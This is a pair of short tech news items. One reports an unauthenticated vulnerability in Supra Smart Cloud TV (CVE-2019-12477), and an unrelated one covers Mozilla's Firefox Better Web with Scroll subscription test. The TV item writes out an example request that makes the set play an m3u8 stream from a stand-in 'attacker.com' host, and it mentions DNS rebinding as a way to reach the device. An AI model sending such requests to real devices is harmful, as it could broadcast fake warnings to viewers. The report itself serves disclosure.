Supra Smart Cloud TV to be Hacked

Now hacker can replace video being watched with own content
04 June 2019   1372

A vulnerability has been identified on the Supra Smart Cloud TV (CVE-2019-12477). It makes possible to replace the transmission currently being watched for the content of the attacker. As an example, the output of a bogus emergency warning is shown.

To attack, just send a specially designed network request that does not require authentication. In particular, hacker can contact the handler "/ remote / media_control? Action = setUri & uri =" by specifying the URL of the m3u8 file with the video parameters, for example "http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker .com / fake_broadcast_message.m3u8 ".

In most cases, access to the IP address of the TV is limited to the internal network, but since the request is sent via HTTP, it is possible to use methods to access internal resources when the user opens a specially designed external page (for example, under the request of a picture or using the DNS rebinding method).

Mozilla to Test Firefox Better Web Service

The main idea of ​​the project is a paid subscription to finance the creation of content, which allows website owners stop showing ads
25 March 2020   318

As part of the Test Pilot program, Mozilla invited Firefox users to test the new Firefox Better Web with Scroll service, which is experimenting with alternative types of site financing. Testing is available only to users of desktop versions of Firefox from the United States. A single Firefox account, also used for synchronization, is used to connect. To participate, you must install a special add-on in Firefox.

The main idea of ​​the project is to use a paid subscription to the service to finance the creation of content, which allows website owners to do without showing ads. The service is organized in conjunction with the Scroll project, developing a model similar to that implemented in the Brave browser - the user pays for a subscription to the service ($ 2.49 per month) and has the ability to view sites that have joined the Scroll initiative without advertising inserts. At least 40% of the funds received from users is distributed between the owners of partner sites, in a proportion corresponding to the time spent by users subscribed to the service on each site (data on how much time is spent on sites Scroll service collects using JavaScript code placed on partner sites).

Get more info at the official blog.